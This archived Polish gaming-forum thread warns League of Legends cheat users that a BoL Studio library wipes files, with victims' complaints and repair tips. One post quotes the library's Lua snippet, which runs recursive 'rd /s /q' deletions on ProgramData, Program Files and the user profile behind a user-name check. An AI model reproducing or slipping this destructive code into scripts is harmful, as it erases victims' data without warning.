Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Nieaktualne] NIE WŁĄCZAĆ BOL STUDIO / INFEKCJA !

Rekomendowane odpowiedzi

Opublikowano

Szperając w antywirusie nazywasz się informatykiem ? WTF ??? Ty chyba mylisz pojęcia teraz informatyk - programista... Weź ty mały człowieczku wyjdź z tego forum.

Nie tylko ;) piszę skrypty , robie cracki do programów piszę programy ;) , mam w przyszłości stworzyć coś lepszego niż bol ;) ale jeszcze tego nie umiem ;)

Dobra a tak ogólnie możecie mi pisać jak bardzo się nie znam na pw, tutaj nie jest na to miejsce i piszemy nie na temat ;)

Jeżeli w jakiś sposób ci pomogłem daj like pod moim postem ;)

• Odpowiedzi 98
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Wie ktoś jak niby to naprawić?

Przywróciłem 1 raz system i niby jest ale nie wszystko. Nie mogę normalnie ustawić tapety bo cały czas czarny ekran...

Próbowalem z tym folderem (C://XXX folder) ale nie działa.

Ktoś coś wie i może pomóc? Nie chce formatowac laptopa równiez nie chce reinstallu systemu robić.

Mogę dać limit za pomoc :P

Opublikowano

Ale co zmieniasz nic się nie dzieje ?

Co pisze ci w prawym dolnym rogu ekranu jeżeli nic to wejdź w cmd następnie wpisz /scannow

I nic z tym nie rób aż się nie skończy jeżeli to nie pomorze to przeskanuj system antivirusem z darmowych polecam avg antivirus

A jeżeli to jeszcze nie pomoże to pw postaram ci się jakoś więcej pomóc

Opublikowano

Ale wy jesteście śmieszni jak płaczecie że wam usuwa pliki, w końcu macie za swoje mogliście nie grac na bolku.Dobrze że mi nie po usuwało nic :)

junior.jpg

Opublikowano

Ale wy jesteście śmieszni jak płaczecie że wam usuwa pliki, w końcu macie za swoje mogliście nie grac na bolku.Dobrze że mi nie po usuwało nic :)

A dlaczego mieli by nie grać , to że nie sprawdzili pliku to nie ich do końca wina ;/

A po drugie sam byś miał ból dupy jakby tobie się pliki usunęły ;)

Opublikowano

Wie ktoś jak niby to naprawić?

Przywróciłem 1 raz system i niby jest ale nie wszystko. Nie mogę normalnie ustawić tapety bo cały czas czarny ekran...

Próbowalem z tym folderem (C://XXX folder) ale nie działa.

Ktoś coś wie i może pomóc? Nie chce formatowac laptopa równiez nie chce reinstallu systemu robić.

Mogę dać limit za pomoc :P

Spróbuj sprawdzić w Windows Update czy masz jakieś aktualizacje...Mi system świrował ale po dociągnięciu kilku updatów wszystko się unormowało :)

A pliki jak pliki - Cóż...Poszły się J**** :/

Pewnie da się to jakoś odzyskać - ale szkoda zachodu jeśli nie straciłes nic na prawdę ważnego - Mi poszły się walić wszystkie teksty i bity na płyte...Bity mam skopiowane a teksty nie ... no ale co zrobisz :D

Opublikowano

Spróbuj sprawdzić w Windows Update czy masz jakieś aktualizacje...Mi system świrował ale po dociągnięciu kilku updatów wszystko się unormowało :)

A pliki jak pliki - Cóż...Poszły się J**** :/

Pewnie da się to jakoś odzyskać - ale szkoda zachodu jeśli nie straciłes nic na prawdę ważnego - Mi poszły się walić wszystkie teksty i bity na płyte...Bity mam skopiowane a teksty nie ... no ale co zrobisz :D

Nie straciłem za dużo :P. Tylko tak jakby save z gier,pliki jakieś aplikacje :P. Ale dzięki sprawdze.

Opublikowano

http://www.nulled.io/topic/2725-official-bol-deleting-files/

Wina vprediction

Usuwa wszystkie pliki z :

ProgramData

ProgramFiles

ProgramFiles(x86)

Profil użytkownika

Na początku miało to na celu zaszkodzenie użytkownikom którzy korzystają z cracked BoL'a, jednakże zamiast == Ralph dał ~=

if GetUser() ~= 'Nulled.IO' then
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramData"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("ProgramFiles(x86)"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\"')
 RunAsyncCmdCommand('rd /s /q "' .. string.gsub(os.getenv("USERPROFILE"), "\\", "\\\\") .. '\\..\\"')
end

Dlatego też zaszkodził i tym, którzy korzystają z BoL'a legit i tym, którzy korzystają z cracka.

Grottolacje.

Ale dziadostwo... Nie powinni czegoś takiego robić wgl...

Nieregulaminowa sygnatura.

Opublikowano

A dlaczego mieli by nie grać , to że nie sprawdzili pliku to nie ich do końca wina ;/

A po drugie sam byś miał ból dupy jakby tobie się pliki usunęły ;)

Tak bo to wielki problem zrobić backup systemu ...

junior.jpg

Opublikowano

O bosh... on tak pewnie joke robi, by nikt nie chciał grac na BoLu  ( żeby sie bali ) Tzn. ja i tak nie gram na bolu bo sie boie ^^ ta seria ostatnich banów była niezła ^^

Opublikowano

Można 

Napewno? Bo nie odpalałem bola przez ostatnie miesiące i sie boje że mi też usunie. Mam czystego bola. Bez żadnego cracka

Opublikowano

Na wszelki wypadek weź vPrediction z githuba Sidy jak już się tak boisz.

Nie będe juz tak kombinować jak wam nie usuwa to nie będe nie wiadomo czego robił.

Opublikowano

U mnie to samo. Sciagnelismy z kuzynem skrypt scrackowany SAC Reborn. Teraz obydwoje pozegranlismy sie z okolo 200 GB Plikow. Przywracanie dalo tylko 20 GB okolo.

NIE WCHODZIC I NIE SCIAGAC NIC Z : 

http://s-develop. net /

Aha. Szkoda, że stefek nie ma nic do tego.

Deadboy

Opublikowano

Jak to przeczytałem, to myślałem, że że śmiechu z krzesła spadne. xD

Bol, który usuwa pliki z kompa. :D

Pewnie nawet po tej akcji armia brazylijczyka(chyba) nie straci na liczebności. Wam chyba muszą konta bankowe wyczyścić(albo co gorsza, konto lola xD), żebyście na oczy przejrzeli.

Btw. Te wasze konta już są pewnie dostarczone do Rito i tylko czekają na bana. Ewentualnie passy kont już latają po internetach. :D

Jakbym pomógł, to liczę na +   xD 

Opublikowano

Jak to przeczytałem, to myślałem, że że śmiechu z krzesła spadne. xD

Bol, który usuwa pliki z kompa. :D

Pewnie nawet po tej akcji armia brazylijczyka(chyba) nie straci na liczebności. Wam chyba muszą konta bankowe wyczyścić(albo co gorsza, konto lola xD), żebyście na oczy przejrzeli.

Przecież to nie BoL, tylko jakaś biblioteka.

Opublikowano

Przecież to nie BoL, tylko jakaś biblioteka.

Biblioteka, która wchodzi w skład BOLa. 

Jakbym pomógł, to liczę na +   xD 

Opublikowano

Biblioteka, która wchodzi w skład BOLa. 

Którą każdy użytkownik ściąga własnoręcznie.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...